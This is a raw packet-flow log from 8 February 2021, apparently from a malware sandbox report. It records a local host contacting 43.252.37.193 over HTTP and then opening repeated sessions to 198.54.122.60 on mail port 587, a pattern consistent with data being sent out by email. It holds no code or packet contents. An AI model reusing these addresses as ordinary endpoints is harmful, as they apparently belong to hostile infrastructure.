Feb 8, 2021 06:39:30.064534903 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:30.064670086 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:30.064733982 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:30.064763069 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:30.064774990 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:30.064882040 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:30.231414080 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:30.231467009 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:30.231739998 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:30.234658957 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:30.441313028 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:40:06.616543055 CET	49166	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:06.808398962 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:06.808557034 CET	49166	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:07.000910997 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:07.001544952 CET	49166	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:07.192433119 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:07.192585945 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:07.192898989 CET	49166	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:07.384181976 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:07.415333033 CET	49166	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:07.604185104 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:07.605465889 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:07.605487108 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:07.605505943 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:07.605525970 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:07.605618954 CET	49166	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:07.624592066 CET	49166	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:07.815047979 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:07.815692902 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:08.019929886 CET	49166	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:08.144864082 CET	49166	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:08.333884954 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:08.334120989 CET	587	49166	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:08.334197998 CET	49166	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:15.141158104 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:15.330313921 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:15.330466986 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:15.519993067 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:15.521085024 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:15.711139917 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:15.711292028 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:15.711941957 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:15.900330067 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:15.901236057 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:16.089907885 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:16.089930058 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:16.091883898 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:16.168807030 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:16.282032967 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:16.282071114 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:16.357623100 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:16.358048916 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:16.366492033 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:16.557199001 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:16.558367968 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:16.559046984 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:16.747736931 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:16.750008106 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:16.754591942 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:16.946511030 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:16.948812962 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:16.949276924 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.139337063 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.166476011 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.167373896 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.356038094 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.356472969 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.377469063 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.382711887 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.383029938 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.389245987 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.396027088 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.565949917 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.566096067 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.571048021 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.571369886 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.577699900 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.577925920 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.584434032 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.584665060 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.757622004 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.757821083 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.768572092 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.768873930 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.774926901 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.775145054 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.775439978 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.775540113 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.948771000 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.948945045 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.960382938 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.960573912 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.966283083 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.966413975 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.966850042 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.966880083 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:17.966938019 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:17.966967106 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:18.137681007 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.137727976 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.137929916 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:18.149120092 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.149168968 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.149194956 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.149353027 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:18.149398088 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:18.155004978 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.155050039 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.155191898 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:18.155356884 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.155391932 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.155419111 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.155443907 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:18.155483961 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:18.326663971 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.326719999 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.326754093 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.326780081 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.326816082 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.326847076 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.337973118 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.338030100 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.338046074 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.338068008 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.338114977 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.338139057 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.343602896 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.343764067 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.343985081 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.344008923 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.344193935 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.344218016 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.344238043 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.344801903 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:18.344875097 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:23.569799900 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:23.758738995 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:23.758883953 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:23.948702097 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:23.949331999 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:24.137994051 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:24.138158083 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:24.138598919 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:24.328649044 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:24.329651117 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:24.518234968 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:24.518385887 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:24.521604061 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:24.589804888 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:24.710063934 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:24.710083961 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:24.778393030 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:24.778821945 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:24.779758930 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:24.968324900 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:24.968978882 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:24.970227003 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:25.158977032 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:25.161336899 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:25.161855936 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:25.350388050 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:25.352536917 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:25.353364944 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:25.544619083 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:25.581515074 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:25.582485914 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:25.771271944 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:25.772377014 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:25.772939920 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:25.773024082 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:25.773116112 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:25.773219109 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:25.775717974 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:25.962524891 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:25.962696075 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:25.964073896 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:25.964231968 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:25.965131998 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:25.965223074 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:26.154612064 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.154818058 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:26.156074047 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.156203985 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:26.346173048 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.346340895 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:26.347129107 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.347218037 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:26.536196947 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.536262035 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.536278009 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.536293030 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:26.536381960 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:26.537271023 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.537338972 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.537352085 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.537441015 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:26.537767887 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:26.725195885 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.725255013 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.725291967 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.725327015 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.725822926 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:26.725895882 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.725934029 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.725970030 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.726008892 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.726126909 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.726339102 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:26.917336941 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.917965889 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:26.928250074 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:27.147239923 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:32.982472897 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:33.171056986 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:33.171560049 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:33.171595097 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:33.171755075 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:33.172802925 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:33.275768995 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:33.361313105 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:33.467045069 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:33.467181921 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:33.658427954 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:33.658946991 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:33.849160910 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:33.849428892 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:33.849714994 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:34.039834023 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:34.040644884 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:34.231985092 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:34.232033968 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:34.234723091 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:34.244353056 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:34.423325062 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:34.423374891 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:34.432908058 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:34.433660030 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:34.434458971 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:34.623193026 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:34.624263048 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:34.625402927 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:34.816788912 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:34.819565058 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:34.820180893 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.011236906 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.013863087 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.014465094 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.205480099 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.228441954 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.228844881 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.419852018 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.420413971 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.421318054 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.421665907 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.422039986 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.422636986 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.425820112 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.612590075 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.612709045 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.615106106 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.615132093 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.615192890 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.616755009 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.616844893 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.803687096 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.803915977 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.806231022 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.806365967 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.807912111 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.808038950 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.808090925 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.808166027 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.994199038 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.994332075 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.996856928 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.996983051 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.997500896 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.997610092 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.997611046 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.997656107 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:35.997709036 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:35.997766972 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:36.185484886 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.185616016 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.185632944 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.185692072 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:36.185761929 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:36.185777903 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:36.187805891 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.187979937 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:36.188617945 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.188642979 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.188659906 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.188669920 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.188817024 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:36.188889980 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:36.377670050 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.377711058 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.377744913 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.377769947 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.377913952 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:36.378295898 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:36.379533052 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.379717112 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.380799055 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.380858898 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.380922079 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.380965948 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.381011009 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.381058931 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.381325006 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:36.381604910 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:36.569570065 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.569628954 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.569642067 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.570035934 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.572334051 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.580653906 CET	587	49170	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:36.789057016 CET	49170	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:39.447235107 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:39.635479927 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:39.635607958 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:39.824616909 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:39.824884892 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:40.012651920 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:40.012923956 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:40.013355970 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:40.201142073 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:40.201845884 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:40.389707088 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:40.389741898 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:40.395356894 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:40.405085087 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:40.584414959 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:40.584474087 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:40.594499111 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:40.594944954 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:40.595896006 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:40.784811974 CET	587	49171	198.54.122.60	192.168.2.22
